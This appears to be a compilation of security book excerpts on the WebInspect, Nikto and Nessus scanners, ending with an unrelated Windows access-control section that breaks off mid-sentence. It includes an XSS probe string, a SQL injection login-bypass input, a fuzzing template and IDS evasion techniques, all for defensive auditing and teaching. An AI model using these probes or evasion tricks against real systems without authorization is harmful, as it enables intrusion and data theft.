WebInspect

WebInspect 7.0 is a proprietary web scanner from SPI Dynamics. A license for one
target IP address is about $4,500. It is available on Windows only.
Version 7 requires Windows XP or higher, with .NET 2.0 and SQL
Server Express. If you get the error Cannot alter the login 'sa',
because it does not exist or you do not have permission while installing SQL Server Express, refer to http://support.microsoft.com/?kbid=917827 for a workaround.
If you have not previously installed .NET 2.0, you are required to log
out of Windows twice: once after the installation of the .NET package
and once after the first start up of WebInspect.

Purpose
Like Nikto, this scanner does check for some known vulnerabilities, but it also does
much more. WebInspect first crawls the web site to figure out its structure, all the
files available, the parameters used in the URL, and the web forms. It uses this information to generate attack traffic derived from both known vulnerabilities and generic attack
vectors (SQL injection, cross-site scripting, command injection) against your web
application.
WebInspect is a great tool to test the robustness of a web application. It was used to
find cross-site scripting in Tikiwiki (an open source wiki), code execution in Oracle
Web server 10g, and information disclosure in IBM WebSphere. It can also be used
to test web services.
WebInspect Scan
A wizard drives you through the main options to start a new scan:
URL
If the web site is not on the standard port 80, you need to include the port number in the URL—for example, http://www.mydomain.net:88/.
Restrict to folder
You can restrict a scan to a folder, or to a folder with its subdirectories.
Assessment method
By default, the web site is crawled and audited at the same time, so you get
results early. You can select “Prompt for web form values during scan.” During
the first scan, every time WebInspect finds a form, it prompts you for the values
to enter. These values are stored and used automatically for future scans. This is
especially useful if you use a web form for authentication and you want to give
WebInspect access to the private content of your web site.
Settings
See the section “Settings Tuning” later in this chapter for the scan settings.
Select a Policy
See the section “Policy Tuning” later in this chapter for more details about predefined and custom policies. To view the detailed list of checks enabled in a policy, select the policy and click on Create.
Network Authentication
WebInspect handles four types of authentication: HTTP Basic, NTLM, Digest,
and Kerberos. It can automatically detect what type of authentication is used on
the web site. Enter a login and password to be used. If your authentication is
done through a web form, select “Prompt for web form values during scan” on
the first screen, as explained previously in the description for the Assessment
method.
Auto-fill web forms
You can change the default values such as zip code, email address, and so on
used in the web forms, and add more of them.
Network Proxy
You can specify an optional proxy server to use. WebInspect includes its own
Proxy. See the section “WebInspect Tools” later in this chapter for more details.
You do not need to fill out all these options. You can click on Finish at any time to
run a scan with the default options (standard policy, no network authentication, no
external proxy, and so on).
If the target is on your local network but also has a public IP address
on the Internet and uses virtual hosts, you may have problems scanning
it with a 1-IP address license from SPI. For example, the local IP
address of the target http://domain.net/ is 192.168.1.50, and its public
IP address is 212.212.212.212. You would have a license for
192.168.1.50. But if you ask WebInspect to scan http://domain.net/, it
may be resolved as 212.212.212.212 by your DNS server. To bypass
this, edit the host file c:\Windows\system32\drivers\etc\hosts and add
the following line:
192.168.1.50 domain.net www.domain.net
This file is checked first by Windows when it needs to resolve a
domain name. In this example, domain.net, www.domain.net (add more
subdomains if needed) are always resolved as 192.168.1.50.
Policy Tuning
The policy management in WebInspect is similar to Nessus (see “Policy Configuration” earlier in this chapter). A set of predefined policies already exists:
Standard
The default policy that includes nondangerous checks only. This policy can be
used on production applications.
Assault
This policy contains dangerous plug-ins and should not be used on web sites in
production.
The Assault policy contains most of the tests, but not all. Some SQL
Injection checks and SOAP assessment are not selected.
Specific groups
You can run certain types of tests: cross-site scripting and SQL injection.
You can also create your own policy from scratch or from an existing policy. To create a new policy, select Tools ➝ Policy Manager. The list of checks is displayed, organized by categories and subgroups, as shown in Figure 3-6.
The default selection corresponds to the Standard policy. You can select each test
individually, or an entire category or subgroup by clicking on the small box. You can
also change the view from display by Attack Groups to display by Severity or by
Threat Classes.
An empty box means that none of the tests inside the group have been
selected. A green square indicates that only some of the tests are selected,
and a checked box indicates that all of them are selected.
To tweak an existing policy, select File ➝ New ➝ Assault Policy or another predefined policy. You cannot overwrite any of the predefined policies; you can only
save the modified version under a new name. The custom policies are then available
under the group Custom.
Settings Tuning
There are a couple of default settings that you may want to change for all your scans.
Select Edit ➝ Default Scan Settings to keep the changes for all the future scans, or
choose Edit ➝ Current Scan Settings for the current session only.
General ➝ Limit maximum URL hits to 15
The same URL is checked a maximum of 15 times, even if it contains variables
that can have more than 15 different values. For example, if the URL is in the
form http://www.domain.net/product.asp?id=X where X can vary from 1 to
1,000,000, WebInspect checks only 15 different values. If you think that some
web pages must be checked with all the possible values referenced on your web site,
you can increase the default value or simply uncheck this option.
General ➝ Limit maximum crawl folder depth to 500
WebInspect crawls up to 500 levels down from the top directory. The use of a
lot of subdirectories is common with URL rewriting, where a URL such as http://
www.domain.net/product.asp?type=clothes&id=1 is rewritten in a more user-friendly way such as http://www.domain.net/products/clothes/1/.
General ➝ Consecutive 'single host'/'any host' retry failures to stop scan
If WebInspect fails to reach a host more than the number of times specified, the
scan is stopped. This can be an issue if there is a network device between WebInspect and the target that you cannot turn off. The device could drop some of the malicious traffic, causing repeated failures. You might want to simply disable this feature.
Requestor ➝ Use separate requestors
You can increase the number of threads on a powerful machine to speed up the
scan.
Session Storage
You may be interested in additional information in the report, such as the list of
404 errors, or whether you hit any setting threshold such as the maximum folder depth
or maximum number of hits for a single URL. You can select these in the
Session Storage section.
File Not Found
WebInspect already contains a number of patterns to identify a custom 404
page. You can also add your own.
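WebInspect's pattern list is proprietary, but the underlying idea is simple enough to sketch. The following Python fragment is a rough sketch of the technique, not WebInspect code; the host is hypothetical and the third-party requests library is assumed. It fetches a deliberately nonexistent page and keeps a snippet of the body, so later responses can be recognized as "not found" even when the server answers with HTTP 200:

import uuid
import requests

def custom_404_signature(base_url):
    # Request a page that cannot exist; many sites answer HTTP 200
    # with a friendly error page instead of a real 404 status.
    probe = "%s/%s.html" % (base_url, uuid.uuid4().hex)
    return requests.get(probe, timeout=10).text[:200]

def looks_like_not_found(response_text, signature):
    # Treat any reply that starts like the custom error page as a 404.
    return response_text[:200] == signature

# sig = custom_404_signature("http://www.domain.net")  # hypothetical host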
The default values are fine for most web sites, but there is such a variety of web
applications that a custom settings feature is a must have for a web scanner.
Report Analysis
If you selected the default simultaneous crawl and audit method, you get the first
results very quickly. On the left side of the report, you can find the tree of folders
and pages found by WebInspect. An icon shows whether a potential vulnerability was found.
By default, the folders are folded. You can right-click on the top
node or any folder to unfold it in order to get a good overview of all
pages found.
If you use a script to generate an image, this script may not be found by WebInspect. This
should be fixed in a later update.
WebInspect lists all references to external web sites. You can right-click on them,
and choose Add Host to include them in the scan, if your license allows their IP
address.
On the right in Figure 3-7, you can see that WebInspect’s dashboard gives you an
overview of how many vulnerabilities were found by severity, and how many tests
are done and how many are remaining.
At the bottom, the Scan Log tab displays the details of the scan. The Server Information tab gives information about the server version (e.g., Apache, Microsoft IIS) and
the services running (e.g., ASP, PHP). The Vulnerabilities tab, the most important,
gives the list of vulnerabilities found for the page selected in the left pane, or for all
the subfolders and pages found in the selected directory.
To view the details of a vulnerability, double-click on one of them in the Vulnerabilities tab, or select a page on the left pane and click on Vulnerability in the center
pane, below Session Info. As shown in Figure 3-8, WebInspect gives a lot of information for each vulnerability—a description, the consequences, a possible fix, and references—that help you to understand what WebInspect finds and whether it is a
false positive (see the next section for further information on false positives).
In the middle pane, under Host Info, there is a particularly interesting feature called
Comments. It displays all the HTML comments found in the page. You would be
surprised to see what information can be found there. It is not convenient to click on
each page to see the comments, but you can export all of them into a single page to
search through. To do so, go to File ➝ Export ➝ Scan Details and choose Comments.
You can do the same thing for hidden fields and other interesting parameters.
False Positives Analysis
Most false positives I encountered are caused by URL rewriting. WebInspect looks for
directories that are not referenced by the web site, usually because they are supposed to
be hidden (e.g., /admin, /test). But if you use URL rewriting to map, for example, http://mydomain.net/forums/ to the folder /groups, WebInspect reports /groups as a hidden
folder, even though it has exactly the same content as the virtual folder /forums.
WebInspect may also report a lot of malicious finds from a directory that uses URL
rewriting. It is common to rewrite URLs that have a lot of variables into a
user-friendly URL that uses a directory structure—for example, http://www.domain.com/product.asp?category=clothes&brand=mybrand&id=1 turns into
http://www.domain.com/products/clothes/mybrand/1. WebInspect thinks /products/clothes/mybrand is a folder and 1 is a filename. So it looks for /products/
clothes/mybrand/admin.exe, /products/clothes/mybrand/debug.pl, and so on. The web server
doesn't return a 404 File Not Found because the file actually executed is always product.asp;
admin.exe and debug.pl are only parameters of the URL for the server. WebInspect doesn't check the content of the file returned (since it could change) and
relies on the web server response code. But you can work around this type of issue.
If the script product.asp is well designed, it should return an error when the ID is
malformed (not a number) or doesn’t exist. You can add this error message to the
list of custom 404 in the WebInspect settings; see “Settings Tuning,” earlier.
Another set of false positives is due to the fact that tests are not correlated with the web
server version shown in the HTTP reply. For example, the availability of /icons tells an
attacker that you are very likely running Apache, and if its content is browsable, the
version of Apache could be figured out. But this does not matter at all, as the server
name and version are part of the HTTP reply. However, this information could be
faked. There is a tradeoff between false positives and false negatives. WebInspect
seems to have chosen to give more information to avoid false negatives; this is always a
good choice for a security tool, even if it means more work to analyze the results.
Whenever you find a false positive, you can mark it as such by right-clicking on the
vulnerability in the left pane and choosing Annotate ➝ Mark As False Positive. You
can also edit the vulnerability information to change its severity and probability.
Under Session Info, there are also a number of very useful features to analyze each
vulnerability. The most used are probably HTTP Request and HTTP Reply, which show
the request from WebInspect and the reply from the server. This is usually enough
to determine whether this is a legitimate hit or a false positive.
The Web Browser feature under Host Info opens the page requested
by WebInspect in a real web browser. If WebInspect performed a successful
cross-site scripting attack, you can actually see the JavaScript being executed.
WebInspect Tools
Once the audit of a web site is finished, you can use tools embedded in WebInspect
to go deeper in a vulnerability analysis or even to exploit a vulnerability found. They
are available under Tools. Here are a few of them:
HTTP Editor
You can tune any request made by WebInspect. If you think WebInspect pointed
out something interesting but did not go far enough, you can tweak the request to
add a custom header or cookie, modify a variable, and replay it, as shown in
Figure 3-9. It includes a hexadecimal editor if you need to add non-ASCII characters. There are a lot of encoding mechanisms (Base64, encryption, hash) accessible by right-clicking on the text you want to encode.
SPI Proxy
WebInspect has integrated an advanced web proxy. In the Search view, you can
search through the requests and the replies. It is interesting to see all the replies from a
particular script to understand how it behaves when attacked.
You must start the proxy before you start the scan. Then, in the last screen of the
scan wizard, choose “Specific proxy server” and type 127.0.0.1 for the address
and 8080 for the port. Figure 3-10 shows that all traffic is recorded, just like a
regular proxy.
SQL Injector
This tool can be used to both confirm and exploit an SQL injection vulnerability.
If you find a confirmed or possible SQL injection vulnerability in the report, copy
the URL into the SQL Injector tool. WebInspect uses different tests to determine
the database version. Unlike some simpler injection tools, it does not rely on a
generic database error message because it could be masked by the server. This
tool works with Oracle, DB2, MySQL, and SQL Server. If the database detection
is successful, it can grab the database structure and the content of each table.
WebInspect can be turned from an audit tool into an exploitation tool.
SPI Fuzzer
WebInspect includes an easy-to-use HTTP fuzzer (see Chapter 22). To start from
an existing request, select Session ➝ Raw Create, and paste the data copied from
an HTTP Request. Then highlight the part you want to fuzz and right-click to
choose Generator. There are a number of predefined generators—for example, a
number generator. Click on Configure to select the minimum (e.g., 0), maximum (e.g., 100), and increment (e.g., 1). You get a request that looks like this:
GET /product.asp?id=[IntGenerator-0] HTTP/1.0
Connection: Close
Host: domain.net
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Content-Type: text/plain
Given our example configuration, WebInspect generates 101 requests from id=0
to id=100 and displays the 101 replies. If you know what you are looking for
(e.g., a specific error message, a 404), you can add a filter to keep the interesting
replies only.
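For comparison, here is a minimal stand-alone sketch of the same idea in Python. This is not WebInspect code: the host is the hypothetical domain.net from the example above, and the third-party requests library is assumed. The integer generator becomes a plain loop, and the filter keeps only the replies worth a second look:

import requests

def fuzz_id(url_template, start=0, stop=100, step=1):
    interesting = []
    for value in range(start, stop + 1, step):
        r = requests.get(url_template.format(value), timeout=10)
        # Keep only unusual replies, e.g., a 404 or a database error
        # string, mirroring the filters available in the SPI Fuzzer.
        if r.status_code == 404 or "ODBC" in r.text:
            interesting.append((value, r.status_code))
    return interesting

# hits = fuzz_id("http://domain.net/product.asp?id={}")  # 101 requests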
All these tools are very powerful and can be used independently of the regular crawl
and audit. I personally use them for further analysis of potential vulnerabilities found
during the audit.
Assessment Management Platform (AMP)
Like Nessus, WebInspect can be set up as a server that clients connect to, and
from which you can control other WebInspect scanners. This allows you to fine-tune the
access you give each pen tester to targets and types of checks.
In WebInspect 7, the SPI Monitor daemon shows in the system tray. It is used to
monitor the scheduled audits and the AMP status. It is stopped by default. You need
to specify a URL, a login, and a password for clients to access the audit.
This feature requires an additional license.

Nikto

The vast majority of Internet-facing software is web applications. While there are
only a few mail or web server products, whose security history is well known, there are thousands of web applications that do not always have a good security record. Nikto
allows network administrators to identify known vulnerable web applications and
dangerous files.
Nikto is an open source web scanner available on Linux and Windows. Nikto 1.35
can identify about 3,200 vulnerable applications or dangerous files on more than 600
servers, and it can identify more than 200 server security issues. The scanner supports SSL and nonstandard HTTP ports as well as the basic web authentication.
Types of Vulnerabilities
The most common vulnerabilities in web applications are:
SQL Injection
If the application does not correctly filter users' form input, and uses that input
in an SQL query, it is possible to hijack the query to modify the database or get
critical information such as login IDs and passwords (a sketch follows this list).
Cross-Site Scripting (XSS)
If the user input of a web form is not properly filtered, it is possible to inject
code (HTML, JavaScript) into a web page. This allows attackers to inject malicious code to a page trusted by the users.
PHP include
A common mistake is to include a page through a URL variable. The value of the
variable could be changed to point to a remote page that would be executed
locally on the server.
Information leak
Configuration files and lists of users or passwords may be left readable on a web
server. Sometimes, it is possible to trick a web application into displaying local
files.
Credential escalation
Some poorly written applications allow anybody to escalate their privileges
through undocumented variables. These hidden variables can often be easily
found and exploited.
Nikto looks for all of these vulnerabilities. It contains a list of such vulnerabilities in
known applications and tests the presence and behavior of these vulnerable pieces of
code.
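To make the first item concrete, here is a small, self-contained Python sketch of a hijackable query next to its parameterized fix. The table and credentials are made up for illustration:

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (login TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")

def login_vulnerable(login, password):
    # User input is pasted straight into the SQL text: the classic mistake.
    query = ("SELECT COUNT(*) FROM users WHERE login = '%s' "
             "AND password = '%s'" % (login, password))
    return conn.execute(query).fetchone()[0] > 0

def login_safe(login, password):
    # Parameterized query: the driver quotes the input, so it cannot
    # change the structure of the SQL statement.
    query = "SELECT COUNT(*) FROM users WHERE login = ? AND password = ?"
    return conn.execute(query, (login, password)).fetchone()[0] > 0

print(login_vulnerable("admin", "' OR '1'='1"))  # True: query hijacked
print(login_safe("admin", "' OR '1'='1"))        # False: input stays data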
Command Line
Nikto is a command-line utility. To start a scan and save the report, type:
[julien@asus ~]# nikto -host domain.net -Format csv -output nikto.csv
---------------------------------------------------------------------------
- Nikto 1.35/1.34 - www.cirt.net
+ Target IP: 192.168.0.1
+ Target Hostname: domain.net
+ Target Port: 80
+ Start Time: Fri Mar 9 10:18:37 2007
---------------------------------------------------------------------------
- Scan is dependent on "Server" string which can be faked, use -g to override
+ Server: Apache/2.0.52 (CentOS)
- Retrieved X-Powered-By header: PHP/5.1.6
+ Apache/2.0.52 appears to be outdated (current is at least
Apache/2.0.54). Apache 1.3.33 is still maintained and considered secure.
+ 2.0.52 (CentOS) - TelCondex Simpleserver 2.13.31027 Build 3289 and
below allow directory traversal with '/.../' entries.
Nikto first gets information about the server. It uses this information to filter the list of CGIs and dangerous files to test:
+ /icons/ - Directory indexing is enabled, it should only be enabled for
specific directories (if required). If indexing is not used at all, the /icons
directory should be removed. (GET)
Nikto tests the server configuration. Then it looks for dangerous files and vulnerable
CGIs:
+ /admin/config.php - Needs Auth: (realm "Access protected")
+ / - TRACE option appears to allow XSS or credential theft. See
http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for details (TRACE)
+ //admin/admin.shtml - Needs Auth: (realm "Access protected")
[...]
+ /index.php?topic=<script>alert(document.cookie)</script>%20 - This might be
interesting... has been seen in web logs from an unknown scanner. (GET)
+ 2563 items checked - 14 item(s) found on remote host(s)
+ End Time: Fri Mar 9 10:20:22 2007 (105 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
The scan is very fast (105 seconds) on a small web site. A complete scan with all the plug-ins
(using the -g option) takes only 40 seconds more.
The report can be saved in text (-Format txt), HTML (-Format htm), or CSV (-Format
csv) format.
Be careful with a report in HTML format. Nikto does not escape the
links. The HTML report can contain dangerous JavaScript or characters.
If you scan an HTTPS server, use the options -ssl -port 443 to run the scan. If some
directories require web authentication, you can provide the login and password
information to Nikto with the option -id login:password.
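For example, a scan of a hypothetical HTTPS server protected by basic authentication would look like this:

[julien@asus ~]# nikto -host domain.net -ssl -port 443 -id julien:mypassword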
There are a lot of false positives. In a scan of my personal server, Nikto
found 14 potential issues. Only two are truly potential issues: directory listing of /icons
and the allowed use of TRACE. The potential PHP vulnerabilities, the potential cross-site
scripting, etc., do not apply. The full scan (-generic option) displays two more potential issues that are also false positives.
If Nikto finds a CGI with the same filename as a vulnerable application, you might consider changing its name, even if it is secured. Nikto
is widely used by script kiddies who will hammer the CGI if it is
reported as vulnerable during a scan.
Evasion Techniques
Unfortunately, Nikto added options to evade an Intrusion Detection System (IDS). I
think it is unfortunate because this tool should not be used to test an IDS. Nikto was
designed to quickly find known vulnerable software, and Nikto does not always try to
exploit the vulnerability. Some tests check only
whether the filename of a page matches that of known vulnerable software (/cgi-bin/
mail.pl, for example). This does not mean the CGI installed is vulnerable to any-
thing, and a request to such a script is legitimate.
The default traffic generated by Nikto can easily be flagged by an IDS since each
HTTP request contains “Nikto/1.35” in the user-agent header. With one signature,
an IDS would detect all the tests. The evasion options do not necessarily make it
harder for the IDS to detect something.
To add an evasion technique, use the option -evasion followed by a number from 1 to 9 (a minimal sketch of the first few transformations follows this list):
1. URL encoding. The URL is encoded. Today’s high-end IDS can manage encoded
URLs without a problem. This evasion technique does not make any difference
to a sophisticated IDS.
2. Add /./ in front of each URL. With the same URL decoding feature used for the
previous evasion technique, the IDS easily restores the original URL. Since this is
a known evasion technique, this technique would probably be detected by most
IDSes, making it worse than useless.
3. Premature URL ending. Nikto actually adds random folders followed by /../. For
example, instead of requesting /icons, Nikto requests /foo/bar/../../icons, which is
functionally the exact same thing. As in evasion 2, not only can the IDS under-
stand the canonical URL just like the web server, it also detects the /../ as a directory traversal, a well-known technique.
4. Append random long strings. Same technique as before, but with much longer
strings and the same results.
5. Fake parameters. Add unnecessary parameters (/uri/?foo=bar). This does not
make any difference to a decent IDS.
6. Tab as request spacer. Use a tab instead of a space to separate the different elements of the URL. Once again, this does not bother a decent IDS.
7. Case-insensitivity. Change random characters to uppercase. Windows servers are
case-insensitive, so the test would still be valid in this instance. But
for most other systems that are case-sensitive (e.g., *nix), the new URLs created
do not make sense. For example, /cgi-bin/mail.pl is different from /cgi-BIn/
mAIl.Pl for Apache on Linux. This evasion technique should be used very
carefully.
8. Use \ as folder separation. This is the same case as above. Using \ instead of /
may be fine with IIS on Windows, but it is not for *nix: the new URL would not
make sense.
You may argue that Internet Explorer allows you to use indifferently /
or \ in a URL regardless of the web server, but it actually translates \ to
/ when it does the request.
9. Session splicing. This is the only interesting evasion technique, even if it is quite
old. It is basically Nikto + fragroute (http://monkey.org/~dugsong/fragroute/).
Nikto generates one-byte data packets. It is a good way to easily test how an IDS
handles heavily fragmented traffic without the hassle of installing fragroute.
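To see how mechanical the first few techniques are (and why a canonicalizing IDS sees through them), here is a small Python sketch that applies techniques 1 through 3 to a path. It illustrates the transformations only; it is not Nikto's code:

import random
import string

def url_encode(path):
    # Technique 1: percent-encode every character of the URL.
    return "".join("%%%02x" % ord(c) for c in path)

def self_reference(path):
    # Technique 2: insert /./ before each path segment.
    return path.replace("/", "/./")

def premature_ending(path, depth=2):
    # Technique 3: random folders followed by /../ pairs; the web
    # server canonicalizes this back to the original path.
    junk = "/".join("".join(random.choices(string.ascii_lowercase, k=4))
                    for _ in range(depth))
    return "/" + junk + "/.." * depth + path

print(premature_ending("/icons"))  # e.g., /qwer/asdf/../../icons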
Nikto should be used to detect vulnerable applications that should not have been
installed on a network. But it should not be used to test the coverage of an IDS, even
if the addition of evasion techniques suggests that it was designed for this. By the
same token, Nessus also contains checks for vulnerable CGIs, but not as many as
Nikto.

Nessus Scan

Given valid credentials, Nessus can also log on to each target host to check for
local vulnerabilities. Nessus looks at specific well-known security vulnerabilities, but
also does generic checks, such as looking for file permissions or sensitive configuration files.
The login and password information are part of the policy. This means that if you
want to connect to servers that have different passwords, you have to create a new
policy for each of them. In the Windows client, the credentials are accessible after
clicking on Edit Settings, as shown in Figure 3-2.
Network Scan
You can run a scan from inside your network to get as much information as you can
on potential vulnerabilities or weaknesses. Or you can scan your network from the
outside to understand how an attacker sees it. You want to do a thorough analysis of
all the servers at the interface between your local network and the Internet, usually your
DMZ: mail servers, HTTP servers with web applications, and VPN servers.
You can start a scan simply by inputting the IP address or hostname of the targets.
Nessus proposes four types of scan:
Nonintrusive scan
This is best suited to scanning targets in a production network. A scan of one target
on a 100 Mbps network from a Windows XP client takes about 25 minutes.
Intrusive scan
This enables all plug-ins, including dangerous checks that can harm the target.
This scan takes about 30 minutes for one target.
Predefined policy
Use a predefined or customized policy defined earlier. Check the section “Policy
Configuration” later in this chapter for more details.
New policy
Define a new policy to use for the scan. Check the later section “Policy Configu-
ration” for more details.
If your goal is to test a remote server, do not forget to turn off any anti-
virus, firewall, or other security software running on the Nessus server.
This software may drop some of the traffic generated by Nessus.
Nessus first does a port scan to identify the services running and the target operating
system (see Chapter 2). It uses a combination of features to determine what the tar-
get is running. Here is what it tries to discover:
• What services are running? For example, SSH and NTP are more common on a
Unix machine; NetBIOS and MS-RPC are more common on Windows.
• How the target reacts to malformed ICMP packets.
• SNMP information.
• Information gathered from an NTP service.
To get more information about operating system fingerprints, check out Chapter 2
and examples related to p0f (see Section 4.4).
The port-scanning phase is very important. It is used by Nessus to know what
plug-ins are relevant (Apache or IIS plug-ins for a web server, Linux or Windows
vulnerabilities, etc.), and what service is running on what port. Nessus can detect services on
nonstandard ports.
If you scan a large network, it is more efficient to place one Nessus
server per network segment.
There could be false detection if the target is behind a Port Address Translator, since
each port could correspond to a different operating system. A firewall between the
Nessus server and the target could drop the malformed ICMP traffic. This would
then lead to false positives in the vulnerabilities found by Nessus. If you know the details
of the machine you are scanning, it is possible to tell Nessus what operating system
or services are running on the host in a policy (see the section “Policy Configura-
tion” later in this chapter).
If you run a web server with virtual hosts—that is you have different web domains
with the same IP address—you need to indicate the list of virtual hosts to Nessus.
Where you enter the IP address of the target, add the hostnames between brackets:
192.168.1.1[domain.com domain.net domain.org]. You can save it in the address book
to avoid typing a long list all the time.
If you happen to scan a network printer, the printer may print garbage
characters indefinitely. It often happens with network printers using
CUPS. You should exclude the IP address of all your network printers.
Scan Results
At the end of a scan, Nessus generates a report that provides a list of all open ports
and the potential risks associated with them. If you use any encryption (SSH, HTTPS, IMAPS,
SMTPS), Nessus analyzes the algorithms allowed and warns you if any weak encryption mechanisms are allowed (see Figure 3-3).
You may see a list of more specific issues (such as a list of vulnerable software ver-
sions that you run) or known vulnerable CGI scripts.
All these results should be double-checked; there are often a lot of false positives:
• A firewall or other security device may have detected the ongoing scan. My firewall detects the scan after a few seconds and blocks all traffic generated by
Nessus. The report then shows a lot of open ports that do not exist on the target
because it misinterpreted the dropped packets (see Chapter 2). Nessus may also
display that it was able to crash the target when the traffic was actually dropped
by the firewall.
• Some vulnerability checks are too superficial. Sometimes, a plug-in looks for the
version in the banner only (a sketch of such a check follows this list). This may not be enough to know whether the service is actually vulnerable. It is possible that the server has been patched without changing the software version, or that the vulnerable options are not
enabled. See “Plug-in Code Example” later in this chapter to understand how to
verify what a plug-in is actually doing.
• If a service or server is incorrectly identified, checks that do not apply to the
actual version may give wrong results.
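To see why banner-only checks are superficial, consider this rough Python sketch of such a check. It is illustrative only, not Nessus plug-in code, and the version comparison it implies is deliberately naive:

import socket

def server_banner(host, port=80):
    # Grab the Server header; this is all a superficial check sees.
    s = socket.create_connection((host, port), timeout=10)
    s.sendall(b"HEAD / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n")
    reply = s.recv(4096).decode("latin-1")
    s.close()
    for line in reply.splitlines():
        if line.lower().startswith("server:"):
            return line.split(":", 1)[1].strip()
    return None

# A banner like "Apache/2.0.52 (CentOS)" proves nothing by itself: the
# distribution may have backported the fix without bumping the version,
# so flagging on the version string alone produces false positives.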
The scan results highlight potential issues that should then be checked one by one.
This is a good base to start tightening up the security of the servers running on a network. But like all the tools described in this book, some manual work is necessary to
analyze the results, and other security checks with other tools should be performed.
All reports are automatically saved and can be reviewed later. You can also com-
pare two reports to see whether you actually increased the security of the target
since the last scan, or whether the target was modified in the meantime.
Policy Configuration
Instead of running a full scan, it is possible to customize the areas that should be
checked. By reducing the number of checks that are done and by tuning the default
settings, you both reduce the duration of the scan and improve its accuracy.
The settings are associated with a policy. This means that each target that requires
special settings (different passwords, for example) requires its own policy. You cannot clone a policy, which makes Nessus hard to use accurately on large networks.
To modify the default settings, create a new policy and click on Edit Settings. Under
the General tab, you can select how thorough the test will be. For a full scan, unselect
"Safe checks" and select "Thorough tests." For more verbose output (but also more false
positives), select Paranoid for report paranoia and "Verbose Report" for verbosity.
The Credentials tab contains settings used for local vulnerability checks. See “Local
Vulnerabilities” earlier in this section for more information.
The tabs for Others and Web contain login and password information for different
services, as shown in Figure 3-4. This information is needed to perform all the tests.
If you have subscribed to the Direct Plugin Feed, you can add your compliance policy files under the Compliance tab. These files describe your company policies for
different OSs. Nessus can check whether the targets comply with them.
You can select the list of plug-ins to enable by clicking Edit Plugins. By default, all
plug-ins shown are enabled. However, if you selected "Safe checks" in the settings,
the plug-ins considered dangerous (denial of service, exploitation of a vulnerability,
etc.) are not run.

WINDOWS: ACCESS CONTROL OVERVIEW

The security subsystem is the primary gatekeeper through which subjects access objects
within the Windows operating system. We use the terms subjects generically here to
describe any entity that performs some action, and objects to mean the recipient of that
action. In Windows, subjects are processes (associated with access tokens), and objects are
securable objects (associated with security descriptors).
Processes are the worker bees of computing. They perform all useful work (together
with subprocess constructs called threads). Securable objects are the things that get acted
upon. Within Windows are many types of securable objects: files, directories, named
pipes, services, Registry keys, printers, network shares, and so on.
When a user logs on to Windows (that is, authenticates), the operating system creates
an access token containing security identifiers (SIDs) correlated with the user’s account
and any group accounts to which the user belongs. The token also contains a list of the
privileges held by the user or the user’s groups. We’ll talk in more detail about SIDs and
privileges later in this chapter. The access token is associated with every process created
by the user on the system.
When a securable object is created, a security descriptor is assigned that contains a
discretionary access control list (DACL, sometimes generalized as ACL) that identifies which
user and group SIDs may access the object, and how (read, write, execute, and so on).
To perform access control, the Windows security subsystem simply compares the
SIDs in the subject’s token to the SIDs in the object’s ACL. If a match is found, access is
permitted; otherwise, it is denied.
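A toy model of that comparison in Python, deliberately simplified: real DACLs are ordered lists of allow and deny entries carrying per-right access masks, and the SIDs below are only sample values:

def access_allowed(token_sids, dacl, requested_right):
    # dacl: ordered list of (type, sid, rights) access control entries.
    for ace_type, sid, rights in dacl:
        if sid in token_sids and requested_right in rights:
            # The first ACE matching both SID and right wins, mirroring
            # the order-dependent evaluation of a Windows DACL.
            return ace_type == "allow"
    return False  # no matching ACE: access is implicitly denied

token = {"S-1-5-21-1527495281-1310999511-3141325392-500",  # the user
         "S-1-5-32-544"}                                   # Administrators
dacl = [("allow", "S-1-5-32-544", {"read", "write"})]
print(access_allowed(token, dacl, "read"))        # True: SID match
print(access_allowed({"S-1-5-7"}, dacl, "read"))  # False: no match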
The remainder of this chapter will take a more detailed look at subjects, since they are
the only way to access objects (absent kernel-mode control, again). For further information
on securable objects, see “References and Further Reading.”
SECURITY PRINCIPALS
As we noted earlier, the fundamental subject within Windows is the process. We also
noted that processes must be associated with a user account in order to access securable
objects. This section will explore the various account types in Windows, since they are
the foundation for most attacks against access control.
Windows offers three types of fundamental accounts, called security principals:
• Users
• Groups
• Computers
We’ll discuss each of these in more detail shortly, just after we take a brief detour to
discuss SIDs.
SIDs
In Windows, security principals generally have friendly names, such as Administrator or
Domain Admins. However, the NT family manipulates these objects internally using a
globally unique, variable-length numeric value called a security identifier, or SID. This prevents the system
from confusing the local Administrator account from Computer A with the identically
named local Administrator account from Computer B, for example.
The SID comprises several parts. Let’s take a look at a sample SID:
S-1-5-21-1527495281-1310999511-3141325392-500
A SID is prefixed with an S, and its various components are separated with hyphens.
The first value (in this example, 1) is the revision number, and the second is the identifier
authority value. Then four subauthority values (21 and the three long strings of numbers,
in this example) and a relative identifier (RID—in this example, 500) make up the remainder
of the SID.
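The string form is easy to take apart programmatically. Here is a short Python helper applied to the sample SID above:

def parse_sid(sid):
    parts = sid.split("-")
    assert parts[0] == "S"
    return {
        "revision": int(parts[1]),
        "identifier_authority": int(parts[2]),
        "subauthorities": [int(p) for p in parts[3:-1]],
        "rid": int(parts[-1]),  # the final component is the relative ID
    }

info = parse_sid("S-1-5-21-1527495281-1310999511-3141325392-500")
print(info["rid"])  # 500: the well-known RID of the Administrator account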
SIDs may appear complicated, but the important concept for you to understand is that
one part of the SID is unique to the installation or domain and another part is shared across
all installations and domains (the RID). When Windows is installed, the local computer
generates a random SID. Similarly, when a Windows domain is created, it is assigned a
unique SID (we’ll define domains later in this chapter). Thus, for any Windows computer or
domain, the subauthority values will always be unique (unless purposely tampered with
or duplicated, as in the case of some low-level disk-duplication techniques).
However, the RID is a consistent value across all computers or domains. For example,
a SID with RID 500 is always the true Administrator account on a local machine. RID 501
is the Guest account. On a domain, RIDs starting with 1001 indicate user accounts. (For
example, RID 1015 would be the fifteenth user account created in the domain.) Suffice to
say that renaming an account’s friendly name does nothing to its SID, so the account can
always be identified, no matter what. Renaming the true Administrator account changes
only the friendly name—the account is always identified by Windows (or a malicious
hacker with appropriate tools) as the account with RID 500.
Why You Can’t Log on as Administrator Everywhere
As is obvious by now (we hope), the Administrator account on one computer is different
from the Administrator account on another because they have different SIDs, and
